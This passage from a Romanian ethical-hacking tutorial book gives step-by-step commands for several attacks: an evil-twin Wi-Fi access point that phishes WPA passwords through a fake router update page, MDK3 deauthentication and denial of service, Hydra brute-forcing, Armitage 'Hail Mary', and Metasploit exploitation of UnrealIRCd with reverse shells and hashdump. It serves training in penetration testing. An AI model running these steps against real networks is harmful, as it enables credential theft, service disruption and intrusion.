și apoi apăsați ENTER, iar acum trebuie să creăm un tabel cu câteva
coloane care să reprezinte datele pe care clientul le introduce în
câmpul de parolă de pe pagina noastră de actualizare de securitate. Deci, pentru a trece în
noua noastră bază de date, trebuie
să tastam;
„utilizați evil_twin”
Și apoi apăsați ENTER și acum vom scrie;
„create_table wpa_keys(parola varchar(64), confirm varchar(64));”
și apoi apăsați enter și în cazul în care vă întrebați acea comandă a creat un
tabel numit „wpa_keys” care conține două coloane. Unul se numește
„parolă”, iar celălalt se numește „confirmare”.
64 reprezintă numărul maxim de caractere care pot fi stocate în
coloană, iar noi folosim 64 deoarece o parolă WPA poate conține până la 64 de
caractere.
Mergând mai departe, trebuie să găsim numele interfeței adaptoarelor de rețea virtuale și
trebuie să găsim adresa noastră IP locală, deoarece le vom folosi în
comenzile viitoare.
Deci, să deschidem un nou terminal și putem lăsa terminalul My SQL
deschis pentru că îl vom accesa mai târziu. În noul terminal trebuie să
tastăm;
„ip space”
și apoi apăsați Enter și continuați și găsiți
numele interfeței adaptoarelor de rețea virtuale și adresa IP locală. Numele interfeței mele este
„eth0” și
adresa mea IP locală este „192.168.0.6”, dar este posibil să fiți diferit.
Deschideți un bloc de note gol pentru a ține evidența acestor informații și continuați și
reprezentați aceste elemente așa cum vă arăt, astfel încât să ne putem referi cu ușurință la
ele mai târziu, fără confuzie.
Vom numi interfața adaptoarelor noastre de rețea virtuale numele interfeței noastre cu fir, iar a
mea este eth0, apoi vom numi adresa IP locală, iar a mea este
192.168.0.1.
Interfață cu fir: eth0
Adresă IP locală: 192.168.0.6
Acum că am luat notă de aceste informații, trebuie să găsim numele
interfeței adaptoarelor noastre de rețea USB. Așa că mergeți mai departe și conectați
adaptorul de rețea USB dacă nu ați făcut deja acest lucru, apoi să revenim
la terminal. În terminal trebuie să tastăm;
„airmon-ng”
și apoi apăsați ENTER și continuați și găsiți
numele interfeței adaptoarelor de rețea USB. Numele interfeței dvs. este afișat chiar sub
„Interfață”
și apoi să notăm asta în blocnotes.
O vom numi interfața noastră wireless, iar a mea este wlan0;
Interfață fără fir: wlan0
și acum trebuie să creăm o interfață de monitor, așa că să ne mutăm înapoi în
terminal și trebuie să tastăm;
„airmon-ng start [wlan0]”
și apoi apăsați Enter, apoi continuați și găsiți numele interfeței monitorului.
Interfața monitorului este afișată în propoziția „(modul monitor activat
pe wlan0)” și apoi să notăm asta în bloc-notes.
O vom numi interfața noastră de monitor, iar a mea este mon0
„Interfață monitor: mon0”
și acum vom folosi „airodump” pentru a găsi rețeaua wireless pe care dorim
să o clonăm, dar mai întâi o voi împărtăși cu voi ceva care
ne va permite să identificăm tipul de router pe care îl folosește rețeaua țintă.
Deci, să ne mutăm înapoi în terminal și să tastăm;
„airodump-ng-oui-update”
și apoi apăsați ENTER. Aici, acordă-i un moment pentru a descărca fișierul „OUI”.
Aceasta ne oferă o listă de producători și
formate cunoscute de adrese MAC. Acest lucru face este că permite „airodump” să compare
BSSID-urile rețelelor descoperite cu lista și să afișeze producătorul corespunzător pentru
noi în rezultatele scanării.
Mergând mai departe, să mergem mai departe și să începem scanarea noastră. Pentru a face
acest lucru, trebuie să tastăm;
„airodump-ng -M mon0”
și apoi apăsați Enter, iar când găsiți rețeaua wireless pe care doriți să o
vizați, trebuie să apăsați tastele „ctrl și C” pentru a opri scanarea. Acum trebuie
să notăm țintele „ESSID”, numărul canalului referit ca „CH”
și țintele „BSSID”.
Prin urmare, să ne întoarcem în blocnotes,
Numărul canalului țintă: 6
BSSID țintă: aa:bb:cc:dd:ee:ff
În ceea ce privește ESSID-ul, asigurați-vă că utilizați orice literă majusculă după cum este
necesar și apoi notați numărul canalului în care al meu folosește 6 și
apoi pentru BSSID , recomand pur și simplu să copiați și să lipiți pentru a vă asigura că
nu faceți nicio eroare.
Pentru a copia text de pe terminalul Kali fără a utiliza clic dreapta, puteți
apăsa pur și simplu tastele „ctrl Shift + C” pentru a copia orice text. La fel ca și în cazul în care
doriți să lipiți
text, puteți apăsa tastele „ctrl Shift + V”.
Odată ce ați lipit aceste informații în blocnotes, acum că avem
informațiile țintelor noastre, putem crea un geamăn rău. Deci, să ne întoarcem în
terminal și acum trebuie să tastăm;
„airbase-ng –e freewifi –c 6 –P mon0”
Aici, faceți referire la ESSID-ul țintelor, apoi la numărul canalului ținte,
care este în cazul meu 6, apoi introduceți numele interfeței monitorului,
unde puteți vedea că al meu este „mon0” și apoi apăsați Enter.
Acum, că punctul nostru de acces geamăn este în funcțiune, trebuie să ne configuram
interfața tunelului, astfel încât să putem crea o punte între punctul nostru de acces geamăn
și interfața noastră cu fir.
Deci haideți să deschidem un nou terminal, dar nu închideți terminalul bazei aeriene
sau terminalul My SQL. În terminal trebuie să tastăm;
„ifconfig at0 192.168.1.129 netmask 255.255.255.128”
Și apoi apăsați Enter. Acum trebuie să adăugăm o tabelă de rutare și să activăm
redirecționarea IP, astfel încât să putem redirecționa traficul către și de la punctul nostru de
acces geamăn,
așa că haideți să scriem;
„route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129”
și apoi apăsați Enter. Acum trebuie să tastăm;
„echo 1 > /proc/sys/net/ipv4/ip_forward”
și apoi apăsați Enter. Acum trebuie să creăm câteva reguli iptables. Aceste reguli
vor determina modul în care este gestionat traficul de rețea. Mai întâi vom crea o
regulă pentru gestionarea traficului care trebuie să meargă la interfața noastră cu fir, care este
sursa noastră de internet, așa că să scriem;
„iptables - - table nat - -append POSTROUTING - -out-interface eth0 –j MASQUERADE”
ar trebui să fie scrisă cu majuscule și apoi apăsați Enter. Acum
trebuie să creăm o regulă pentru gestionarea traficului care intră în
interfața noastră de tunel, așa că să scriem;
„iptables - -append FORWARDA - -in-interface at0 -j ACCEPT”
și apoi apăsați Enter. Acum trebuie să creăm o regulă care să permită
conexiuni TCP pe portul 80 și să le redirecționăm către serverul nostru web, așa că trebuie să
tastam;
„iptables -t nat -A PREROUTING –p tcp - -dport 80 –j DNAT - -to-destination 192.168.0.6:80”
și apoi apăsați Enter. Pentru regula finală, trebuie să creăm o regulă care să ne permită
să furnizăm o traducere a adresei de rețea și pentru a face acest lucru trebuie să tastăm;
„iptables -t nat -A POSTROUTING –j MASQUERADE”
și apoi apăsați Enter. Acum că avem tabelele IP configurate, trebuie să-l îndreptăm către
fișierul nostru de configurare DHCP D și să pornim serverul nostru DHCP, așa că să
introducem;
„dhcpd -cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0”
și apoi apăsați Enter. Apoi tastați;
„/etc/init.d/isc-dhcp-server start”
și apoi apăsați Enter. Ar trebui să vedeți acum următoarea ieșire:
„Pornirea serverului ISC DHCP: dhcpd”
Aceasta reflectă faptul că serverul dhcp a fost pornit și a pornit cu succes. Pentru ultimul
pas, trebuie să forțăm clienții rețelei țintă să se conecteze la
punctul nostru de acces geamăn.
Pentru a realiza acest lucru, trebuie să deconectam clienții de la rețeaua țintă
efectuând un atac de deautentificare. Rețineți că există diferite
moduri de a face acest lucru, dar pentru acest atac vom folosi MDK3. Mai întâi trebuie să
creăm un fișier pe lista neagră care conține adresa MAC sau BSSID-ul
țintei .
Deci, să tastăm;
„echo aa:bb:cc:dd:ee:ff > lista neagră”
aa:bb:cc:dd:ee:ff aici face referire la BSSID-ul țintelor, așa că mergeți mai departe și
copiați-l din bloc-notes și apoi inserați-l în terminal pentru a-l lista neagră
ca mai sus și apoi apăsați ENTER.
Apoi, pentru a începe atacul de deautentificare, trebuie să tastăm;
„mdk3 mon0 d –b blacklist –c 6”
Aici trebuie să introduceți numele interfeței monitorului, iar al meu este
mon0, apoi numărul canalului țintă și al meu este 6, apoi apăsați
enter. Acum puteți trece la computerul pe care îl utilizați pentru a
simula o victimă.
Dacă atacul de deautentificare are succes, computerul victimei ar trebui să piardă
conexiunea curentă în orice moment. Odată ce computerul victimă și-a pierdut
conexiunea, ceea ce se va întâmpla este că computerul victimă va încerca să
restabilească conexiunea pe care tocmai a pierdut-o, totuși, deoarece am suspendat
rețeaua autentică, ar trebui să se conecteze la rețeaua geamănă. in schimb.
Dacă te întorci la terminalul aerobase pentru a urmări conexiunea, ar
trebui să arate că cineva este conectat la punctul tău de acces geamăn. Deci, dacă
vă mutați înapoi la computerul victimei, puteți deschide un browser web
și încercați să accesați google.com.
Aici, ar trebui să vedeți că ați fost adus la o pagină de actualizare de securitate
și, ca utilizator, doriți să vă asigurați că routerul dvs. este la curent cu toate
actualizările sale, în special ca actualizări de securitate, așa că vă va cere să introduceți
parola WPA. așa cum solicită actualizarea routerului.
După ce ați confirmat parola, faceți clic pe Actualizare. Acum să revenim
la terminalul My SQL și să verificăm dacă ați reușit să capturați
parola WPA.
În terminal, trebuie să tastăm;
„utilizați evil_twin”
și apăsați Enter. Apoi vom tasta;
„selectați * din wpa_keys;”
și apoi apăsați Enter și ar trebui să vedeți acolo parola clienților a fost
stocată în baza dvs. de date My SQL.
Parola ar trebui să fie afișată sub „parolă”, iar
parola confirmată este sub „confirmare” în baza de date My SQL.
Dacă clientul ar fi trebuit să introducă parole care nu se potrivesc, ar fi fost
adus la o pagină de eroare care i-a cerut să introducă din nou parolele, deoarece
nu se potriveau.
Dacă clientul ar fi făcut clic pe butonul de anulare, acesta ar fi fost adus pe o
pagină care îi asigură cât de importantă este această actualizare de securitate și care este
spre
binele său și că nu va putea naviga pe internet până nu va
efectua actualizarea .
Așa puteți crea un punct de acces geamăn rău și puteți configura o pagină web
care va capta parola WPA.
Vă rugăm să vă asigurați că aveți autorizație scrisă înainte de a utiliza aceste instrumente,
deoarece
ar putea cauza un prejudiciu grav tuturor dispozitivelor de rețea care sunt conectate la
rețea.
Dacă exersezi doar în laboratorul tău de acasă, într-un mediu care nu este de producție,
asta nu ar trebui să provoace probleme nimănui; totuși, aș sugera să închideți
routerul și să exersați cu grijă fără nicio conexiune la internet.
Capitolul 29 Atacul DoS cu MKD3
O altă amenințare la securitatea întreprinderii este, desigur,
atacurile DOS sau Denial of Service. După cum sugerează și numele, un atac de tip denial of
service, dacă are succes,
împiedică alte persoane să utilizeze resursa sau serviciile.
Întrerupe serviciile pentru alți utilizatori. A existat un caz în presă în care un
individ a decis că s-a săturat ca oamenii să-și folosească telefonul mobil
în timp ce conduceau, așa că a condus cu un bruiator celular în mașină și, în
timp ce conducea, bloca toate frecvențele de pe telefonul celular.
reţea.
Așa că vehiculele din jurul lui, acei oameni nu își pot folosi telefoanele mobile și ați
putea spune, wow, e o idee grozavă, dar trebuie să vă amintiți că
forțele de ordine, ambulanțele folosesc și serviciile celulare.
Prin urmare, atunci când întrerupeți frecvențele din rețeaua celulară pentru alți oameni,
o întrerupeți și pentru servicii pentru care nu doriți să o perturbați
. Acest individ a fost găsit în cele din urmă și, odată ce
l-au găsit, a fost arestat și a primit o amendă grea.
Dar, cum executați un atac de tip denial of service? Ei bine, în wireless există
două moduri majore. Primul este să-ți bombardezi punctul de acces Wi-Fi cu
trafic inutil. Dacă creați mult trafic și punctul de acces încearcă să
decidă ce să facă cu asta, procesează toate acele cereri de autentificare?
Ce se întâmplă dacă ați trimis o cerere de sondă și, în timp ce punctul de acces se ocupă de
acel trafic, nu se ocupă de alt trafic de utilizator. Deci, practic, o abordare
este doar ocuparea punctului de acces, astfel încât să nu poată gestiona traficul legitim.
A doua abordare este pur și simplu de a crea zgomot și interferență în
banda de frecvență pe care funcționează punctul de acces. Pot transmite semnale
care doar perturbă și interferează cu orice alte semnale care trec prin aer
în același timp.
Ei bine, în acest capitol, vă voi împărtăși cum să efectuați un
atac DOS. Refuzarea serviciului sau DOS înseamnă că vom scoate
pe toată lumea dintr-o rețea și le vom refuza serviciul.
În primul rând, trebuie să atașăm adaptorul nostru de rețea fără fir. Odată ce ați făcut asta,
trebuie să deschideți un terminal și apoi să tastați;
„ifconfig”
apăsați Enter și acum trebuie să deschideți un fișier text deoarece trebuie să notați
unele informații. În primul rând, vom lua notă de
interfața noastră wireless, care pentru mine este wlan0.
Continuă și notează acest nume. Odată ce ați făcut asta, vă puteți șterge
terminalul tastând
„clear”,
apoi apăsați Enter. Apoi, trebuie să scanăm punctele de acces disponibile, astfel încât să
putem găsi
o țintă, așa că tastați;
„iwlist wlan0 scan”,
apoi apăsați Enter. Aceasta va lista toate punctele de acces disponibile, așa că mergeți mai
departe și
căutați o țintă. Odată ce v-ați găsit ținta, trebuie să notați
e SSID-ul și apoi trebuie să notați BSSID-ul, apoi trebuie
să notați numărul canalului.
După ce ați făcut asta, trebuie să creăm un fișier pe lista neagră, așa că tastați;
„echo (BSSID-ul punctului de acces țintă) > lista neagră”
și apoi apăsați Enter. Aceasta va crea un fișier numit „lista neagră”, care conține
punctele de acces țintă BSSID. Acum trebuie să punem interfața noastră wireless în
modul monitor. Pentru a face acest tip;
„airmon-ng start wlan0”,
apoi apăsați Enter. Această comandă va crea o interfață de monitor numită
„mon0” Continuați și notați acea interfață de monitor. Pentru a confirma că este
apelată interfața de monitorizare, puteți tasta;
„airmon-ng”
Și apoi apăsați ENTER. Aceasta va afișa toate interfețele dvs. și
ar trebui să vedeți acolo noua interfață de monitorizare numită „mon0”. Acum suntem
gata să efectuăm atacul nostru DOS, așa că haideți să scriem;
„mdk3”
, apoi apăsați enter. În continuare, vom tasta;
„mdk3 mon0 d –b blacklist –c 6”
Aici, trebuie să tastați numele interfeței monitorului, care este mon0, apoi numele
fișierului nostru din lista neagră, care în cazul meu se numește „blacklist”, și apoi canalul
de acces țintă. punctul care este în cazul meu este „6”.
Odată ce ați făcut acest lucru, continuați și apăsați ENTER. În continuare, veți vedea că va
începe să trimită pachete și va începe să inunde rețeaua.
Între timp, dacă veți căuta alte mașini conectate la aceeași
rețea, veți observa că acestea vor fi deconectate. Acum trebuie să mergem
mai departe și să deschidem un alt terminal și vom scrie;
„mdk3 mon0 a –m –i (puncte de acces țintă BSSID)”
și apăsați Enter. Privind la un alt computer din apropiere, ar trebui să vedeți
că tocmai a fost scos din rețea. Dacă vă uitați la Wi-Fi-ul dvs.,
ar trebui să vedeți că a fost deconectat.
Puteți continua și încerca să vă conectați la BSSID-ul vizat, dar vă va
da un mesaj de expirare a conexiunii. Asta este. După cum vedeți, atacurile DOS
sunt relativ simple. Ar trebui să vedeți că ați fost deconectat și
acum nu ne mai putem conecta și așa puteți efectua un atac DOS
folosind MDK3.
Capitolul 30 Atacul cu forță brută cu TCP Hydra
În acest capitol, veți învăța cum să analizați un atac cu forță brută împotriva
sistemului țintă. În acest scenariu, imaginați-vă că aveți 3 noduri. Atacatorul va
folosi un Kali Linux cu adresa IP 10.0.0.111, iar
mașina victimă va folosi un dispozitiv Windows 10 cu o adresă IP 10.0.0.202.
În cele din urmă, testerul de penetrare va folosi Kali Linux pentru a intercepta tot traficul
și pentru a analiza orice atacuri asupra rețelei. Imaginează-ți că tu ești atacatorul și
vrei să ataci una dintre gazdele din rețea care are un serviciu Telnet
activat.
Primul lucru pe care îl va face un hacker este să încerce să forțeze victima țintă.
Pentru început cu un atac cu forță brută, există diverse instrumente pe care le puteți folosi,
dar există una care este foarte populară printre testerii de stilouri și nu am
acoperit încă se numește „hydra”.
Pentru a utiliza hydra, trebuie să deschideți mai întâi fereastra terminalului Klai Linux și
să tastați comanda:
„hydra –V –l (calea fișierului parolei dicționarului) –t 50 –(adresa IP a victimei) ssh”
Apoi apăsați Enter. Aici, opțiunea „-V” este pentru verbozitate maximă, apoi „-l
” este pentru numele de conectare, urmată de calea fișierului parolei dicționarului, iar
argumentul „–t” selectează numărul de conexiuni paralele.
Cu cât numărul este mai mare, cu atât mai rapid va avea loc testarea, urmată de
adresa IP a victimei și, în sfârșit, de protocolul pe care vreau să-l pun cu forța brută. După ce
ați apăsat Enter, atacul va începe și tot ce trebuie să faceți este acum
să așteptați ca parola să fie spartă.
Parola ar trebui să fie spartă în câteva minute. Din perspectiva hackerilor,
care este următorul pas? Ei bine, hackerul va încerca să se autentifice folosind Telnet.
Mai întâi, hackerul ar lansa comanda Telnet, apoi va specifica adresa IP
a gazdei victimei și va introduce numele de conectare urmat de
parola spartă.
În acest moment, hackerul este fericit de această victorie. Dacă sari în
aparatul de testare a penetrării și analizezi acest hack, ar trebui să vezi ce
se întâmplă atunci când atacatorul încearcă o combinație de nume de utilizator și parole
care nu sunt autorizate.
Pentru a analiza aceste tipuri de conversații în Wireshark, faceți clic dreapta pe orice
pachet și selectați „Urmăriți fluxul TCP”. Mesajul va spune că nu mai
sunt permise conexiuni la serverul telnet. "Vă rugăm să încercați din nou mai târziu".
Acesta este mesajul tipic pe care atacatorul îl primește din nou și din nou
atunci când eșuează în timpul atacului cu forță brută.
În Wireshark, când te uiți la traficul atins, trebuie să defilezi
în jos până când nu mai vezi acest tip de model, iar dacă urmărești
din nou fluxul, ar trebui să vezi numele de utilizator și parola în text simplu și
ar trebui să vezi, de asemenea, comanda pe care a executat-o ​atacatorul.
Lista pe care o vedeți în această pagină este Protocoale text clar, cum ar fi HTTP, FTP
și protocoale de e-mail, cum ar fi POP, IMAP, SMTP, Telnet sau Voice over IP.
Dacă descoperiți că clientul dvs. utilizează unul dintre aceste protocoale, trebuie să
menționați asta în raportul final. O soluție simplă este înlocuirea acestor
protocoale de text clar cu alte protocoale securizate, cum ar fi HTTPS în loc de HTTP,
SFTP sau SCP în loc de FTP și așa mai departe.
Capitolul 31 Armitage Hail Mary
Armitage este o interfață interfață excelentă pentru framework-ul Metasploit.
Armitage a fost dezvoltat cu scopul de a ajuta profesioniștii în securitate
să înțeleagă mai bine hackerii și modul în care aceștia desfășoară diferite atacuri.
Pentru mai multe informații despre acest proiect excelent, vă rugăm să verificați
site-ul oficial Armitage la fastandeasyhacking.com. Cum se folosește Armitage?
Ei bine, Armitage este inclus și în Kali Linux, de aceea tot ce trebuie să faceți este să
îl activați este să tastați în interfața liniei de comandă:
„armitage”
Apoi apăsați Enter. Puteți doar să acceptați opțiunile implicite pentru fereastra în care
apare prima dată și să faceți clic pe butonul Conectare, apoi să faceți clic pe Da pentru a porni
serverul Metasploit RPC.
Interfața de utilizator Armitage are trei panouri principale numite Module, Targets
și Tabs. Puteți face clic pe zona dintre aceste panouri pentru a le redimensiona dacă doriți
, dar să ne uităm la fiecare dintre aceste panouri.
Panoul de browser al modulului vă permite să lansați un
modul auxiliar Metasploit, un exploit sau să generați o sarcină utilă și să rulați un modul post-
exploatare.
Panoul țintă arată țintele dvs. Armitage reprezintă fiecare țintă ca un
computer cu adresa IP alocată sau statică și alte informații despre aceasta
sub pictograma computerului.
Odată ce rulați instrumentul Armitage, acesta ar trebui să identifice deja o gazdă dacă aveți
alte sisteme care rulează în sesiune. Dacă aveți multe gazde,
vizualizarea grafică va deveni dificil de lucrat.
Dacă se întâmplă acest lucru, pentru această situație, Armitage are în schimb o vedere de
tabel.
Prin urmare, accesați elementul de meniu Armitage, apoi selectați „Set Target View”,
apoi selectați opțiunea „Table View”. Mai jos, aveți zona de file.
Armitage deschide fiecare consolă de dialog și tabel într-o filă de sub panourile modulului și
țintă. Consola Metasploit sau consola Meterpreter și interfețele shell
folosesc fiecare o filă de consolă.
O filă de consolă vă permite să interacționați cu acele interfețe prin Armitage.
Dacă doriți să deschideți o nouă consolă, trebuie să mergeți la meniul Vizualizare și
să selectați Consolă.
Jurnalele Armitage sunt toate shell-ul consolei, iar jurnalul de evenimente vă va oferi o ieșire
pentru dvs. Acesta organizează acele jurnale după dată și noduri. Veți găsi aceste jurnale în
folderul Armitage.
Accesați Vizualizare, apoi Raportare, selectați apoi „Jurnalele de activitate” pentru a deschide
folderul
. Imaginați-vă că doriți să exportați tot traficul pe care l-ați realizat în această
aplicație.
Armitage și Metasploit partajează o bază de date pentru a vă urmări gazdele, serviciile,
vulnerabilitățile, acreditările și șirurile de agenți de utilizator, capturate de
modulele de exploatare ale browserului.
Pentru a obține toate aceste informații, accesați Vizualizare, Raportare, apoi faceți clic pe
Exportați
date. Această opțiune va exporta datele din Metasploit și va crea
fișiere cu valori separate prin file XML ușor analizabile.
Când vine vorba de spații de lucru, caracteristica Armitage Dynamic Workspaces
vă permite să creați vizualizări în baza de date gazdă și să comutați rapid între ele.
Pentru a înțelege mai bine despre ce vorbesc, selectați meniul Spații de lucru,
apoi faceți clic pe Gestionare. Pentru a vă gestiona spațiile de lucru dinamice, puteți
adăuga, edita și elimina spațiile de lucru pe care le-ați creat deja.
Pentru a începe un atac, Armitage reunește mai multe scanări Metasploit într-o singură funcție
numită Scanări MSF. Această funcție va scana pentru câteva porturi deschise.
Similar cu nmap, apoi enumeră mai multe servicii comune folosind
module auxiliare Metasploit care sunt încorporate în acest scop. De
exemplu, puteți ataca o mașină Windows XP.
Îl puteți selecta, faceți clic dreapta și apoi faceți clic pe Scanare. De asemenea, puteți accesa
meniul Gazde și faceți clic pe Scanări MSF, deoarece ambele vă vor oferi aceeași
funcționalitate.
După ce scanarea este completă, înainte de a începe să ataci, trebuie să-ți
alegi arma. Armitage face acest proces foarte ușor. Selectați
meniul „Atacuri” și faceți clic pe Găsiți atacuri.
Opțiunea „Găsiți atacuri” va genera un meniu de atac personalizat pentru fiecare gazdă.
Pentru a exploata o gazdă, faceți clic dreapta pe ea și navigați la Attack și alegeți un
„Exploitare” din listă.
Fereastra de dialog „Exploare” vă permite să configurați opțiunile pentru un modul și să alegeți
dacă să utilizați sau nu o sarcină utilă de conectare inversă. Pentru exploatările de la distanță,
Armitage vă alege sarcina utilă.
În general, Armitage va folosi Meterpreter pentru ținte Windows și o
sarcină utilă de shell de comandă pentru ținte UNIX. După aceasta, tot ce trebuie să faceți este

faceți clic pe butonul „Lansare”.
Dacă exploatarea are succes, Armitage va face gazda roșie și o va înconjura
cu bile de fulger înfricoșătoare. Dacă exploatarea manuală eșuează, nu vă faceți griji. Ai
opțiunea „Bună Maria”.
Accesați meniul „Atacuri” și faceți clic pe „Bună Maria” pentru a lansa această funcție.
Funcția Hail Mary de la Armitage va găsi exploit-uri relevante pentru ținta dvs., apoi
filtrează exploit-urile folosind informații cunoscute și apoi le sortează într-o
ordine optimă.
Această caracteristică nu va găsi toate shell-urile posibile, dar este o opțiune bună dacă nu
știți
ce altceva să încercați. Armitage facilitează gestionarea
agentului Meterpreter odată ce exploați cu succes o gazdă.
Apoi, puteți face clic dreapta pe „gazdă” pentru a accesa meniul Meterpreter, apoi
selectați „Meterpreter” și alegeți orice doriți din listă.
De exemplu, puteți selecta „răsfoiți fișierele din listă”. Nu fi
surprins dacă găsește elemente de director pe computerul victimei. Armitage este grozav
și foarte ușor de folosit, dar îți recomand să exersezi cu el și să vezi care
metodă de atac este cel mai de succes pentru cerințele tale.
În cele din urmă, vă voi cere din nou să vă asigurați că aveți autorizație scrisă
pentru utilizarea Armitage într-un mediu live sau de producție. Dacă exersezi doar
în laboratorul tău de acasă, într-un mediu care nu este de producție, asta
nu ar trebui să provoace probleme nimănui; totuși, aș sugera să închideți routerul și
să exersați cu grijă fără nicio conexiune la internet.
Capitolul 32 Cadrul Metasploit
Exploatarea este inima hacking-ului etic. Prin exploatarea vulnerabilităților,
puteți începe să faceți presupuneri cât de periculos poate fi.
Metasploit Framework sau MSF este un instrument open source conceput pentru a
facilita testarea de penetrare. Aplicația este scrisă în
limbajul de programare Ruby.
Utilizează o abordare modulară, facilitând astfel exploatările. Acest lucru facilitează
dezvoltarea și codificarea exploit-urilor și permite, de asemenea,
implementarea cu ușurință a atacurilor complexe.
Modulul de exploatare este fragmentele de cod care vizează vulnerabilități specifice.
Exploatările active vor exploata o anumită țintă și vor rula până la finalizare, apoi
vor ieși.
Pe de altă parte, exploatările pasive așteaptă gazdele de intrare, cum ar fi
browserele web sau clienții FTP, și le exploatează atunci când se conectează la rețea.
Sarcinile utile sunt codul rău intenționat care implementează comenzi imediat
după o exploatare cu succes. Modulele auxiliare nu stabilesc sau
nu acceptă direct accesul între pen tester-ul și sistemul țintă.
În schimb, efectuează funcții conexe, cum ar fi scanarea, fuzzing sau sniffing,
care sprijină faza de exploatare. În urma unui atac de succes,
modulele post rulează pe ținte compromise pentru a aduna date utile și pentru a pivota
atacatorul
mai adânc în rețeaua țintă.
Codificatoarele sunt folosite pentru a ocoli apărările anti-virus, iar aceste module codifică
sarcina utilă, astfel încât să nu poată fi detectată folosind tehnici de potrivire a semnăturilor.
În cele din urmă, modulele No-Operations sunt folosite pentru a facilita depășirile de buffer
în timpul atacurilor. Pașii pentru exploatarea unui sistem țintă folosind MSF încep mai întâi
cu alegerea și configurarea unui exploit.
Apoi, trebuie să verificați sistemul țintă pentru a determina dacă este susceptibil de a fi
atacat de exploit. Acest pas este opțional și ar trebui să fie metoda dvs. de a
minimiza detectarea.
După aceea, puteți alege și configura sarcina utilă, care este codul care
va fi executat pe sistemul țintă în urma unei exploatări reușite. Un
exemplu de sarcină utilă ar fi ceva ca o inversare de la
sistemul compromis înapoi la gazda pentester.
După acest pas, puteți alege și o tehnică de codificare pentru a ocoli
controalele de detectare, cum ar fi sistemul de detectare a intruziunilor sau software-ul
antivirus.
În cele din urmă, trebuie să executați exploitul.
Lasă-mă să explic cum se face. În calitate de tester, ar trebui să investigați fiecare
vulnerabilitate. De exemplu, pe portul 6667 Metasploitable rulează aplicația
numită „unrealircd”, care este un daemon IRC.
Această versiune conține o ușă din spate pe care s-ar putea să nu o observi luni de zile,
declanșată prin trimiterea literelor A, B, urmată de o comandă de sistem către
server pe orice port de ascultare.
Metasploit are un modul pentru a exploata acest lucru pentru a obține o interactivitate. Pentru
a începe
hack-ul, deschideți mai întâi consola. În Kali, va trebui să porniți
serverul „PostgreSQL” înainte de a porni cadrul.
Apoi, trebuie să rulați aplicația „msfconsole”. Ca orice
aplicație de consolă, introduceți cum sau un semn de întrebare o dată în promptul de
comandă,
astfel încât aceasta va afișa și lista toate comenzile disponibile împreună cu o descriere
a pentru ce sunt folosite.
Puteți începe să vă organizați proiectul folosind ceea ce se numește spații de lucru.
Puteți crea un spațiu de lucru nou pentru laboratorul dvs. și, apropo,
argumentul „-a” este folosit pentru adăugarea unui spațiu de lucru.
Apoi, pentru a vă asigura că este selectat un nou spațiu de lucru, lansați comanda
„workspace”
pentru toate spațiile de lucru care sunt stocate în baza de date Metasploit. Apoi,
căutați exploit folosind comanda
„căutare”
. Exploita-ul returnat pentru serviciul IRCD ar putea fi listat și atribuie
clasamentul relativ al succesului său la realizarea unui exploit.
Puteți copia numele exploatării pentru a-l folosi în comenzile următoare. Informații
suplimentare
despre acest exploit pot fi obținute utilizând comanda
„info”
. Informațiile returnate ar trebui să includă referințe, precum și
informații despre acest exploit. Este mai bine să-l verificați înainte de a continua
și să vă pierdeți timpul.
Pentru a instrui Metasploit că veți ataca ținta cu un exploit, lansați
comanda
„utilizare”
. După comanda „utilizare”, Metasploit schimbă
promptul de comandă din „msf” în „msf exploit (unreal_ircd_3281_backdoor)”.
Dacă trebuie să setați opțiuni pentru exploit, o puteți face executând comanda
„afișați opțiuni”
. De exemplu, dacă trebuie să setați câmpul necesar pentru
gazda la distanță, care este adresa IP a sistemului atacat, pentru a schimba valoarea
oricărei opțiuni, începeți cu cuvântul cheie
„set”
, urmat de numele opțiunii și în cele din urmă, introduceți
valoarea opțiunii.
Pentru a executa sarcina utilă, tastați comanda
„show payload”
pentru a lista toate încărcăturile utile potrivite pentru acest exploit. Există o mulțime de
ele, dar puteți selecta
„sarcina utilă inversă”
pentru acest exemplu. De ce ai face asta? Ei bine, asta se datorează faptului că este o
sarcină utilă populară pentru shell-urile UNIX. Când spun popular, înseamnă că oamenii l-au
folosit înainte
cu o rată de succes bună.
Apoi, trebuie să verificați opțiunile pentru sarcina utilă selectată. Opțiunea Payload
vă va cere să introduceți o valoare pentru adresa IP a gazdei locale. Puteți
verifica asta cu comanda
„if config”.
Introduceți valoarea și apăsați Enter. Pentru a începe atacul, introduceți comanda
„exploat”
și apăsați Enter. Metasploit inițiază atacul și va confirma prin
indicarea sesiunii 1 de shell de comandă deschisă și oferind adresele IP care
generează și termină shell-ul invers.
Atunci când un sistem este compromis în această măsură, este pregătit pentru
activitățile post-exploatare. Post-exploatarea este o parte a fluxului de lucru în care
atacatorul atinge valoarea totală a atacului.
urmatoarele activitati. El sau ea efectuează o evaluare rapidă pentru a caracteriza
mediul local, cum ar fi infrastructura, conectivitate, conturi, prezența
fișierelor țintă sau a aplicațiilor care pot facilita alte atacuri.
De asemenea, localizează și copiază sau modifică fișierele țintă de interes, cum ar fi fișierele
de date
sau informațiile financiare. În plus, creează conturi suplimentare și
modifică sistemul pentru a sprijini activitățile post-exploatare.
În plus, încearcă să escaladeze vertical nivelul de privilegii prin captarea
acreditărilor de administrator sau de sistem și încearcă să atace alte
sisteme de date care sunt numite escaladare orizontală.
Prin pivotarea atacului prin sistemul compromis către restul
rețelei, instalează uși din spate persistente și canale ascunse pentru a păstra
controlul și a avea comunicații sigure cu sistemul compromis.
În cele din urmă, atacatorul poate elimina indicațiile atacului din
sistemul compromis. Pentru a avea succes, activitățile post-exploatare necesită
cunoaștere cuprinzătoare a sistemului de operare al țintei pentru a se asigura că
controalele de protecție pot fi ocolite.
Ai învățat deja cum să exploatezi sistemul anterior, așa că vei
pune sesiunea în fundal apăsând „Ctrl+Z” și tastați „y” pentru a
confirma.
Este esențial să cunoașteți ID-ul sesiunii pentru modulul de post-exploatare pe care
urmează să-l utilizați. Acest lucru poate fi obținut cu comanda „sesiuni”.
Dacă ați folosit acest instrument pentru prima dată, sesiunea dvs. este 1. Unul dintre primele
module pe care le puteți încerca se numește „hashdump”, care va încerca să colecteze
hash-urile parolei sistemului.
Singura setare pe care trebuie să o introduceți aici este ID-ul sesiunii. Înainte de a
continua, trebuie să setați ID-ul sesiunii în secțiunea de opțiuni.
Un alt modul de post-exploatare foarte interesant al Metasploit este
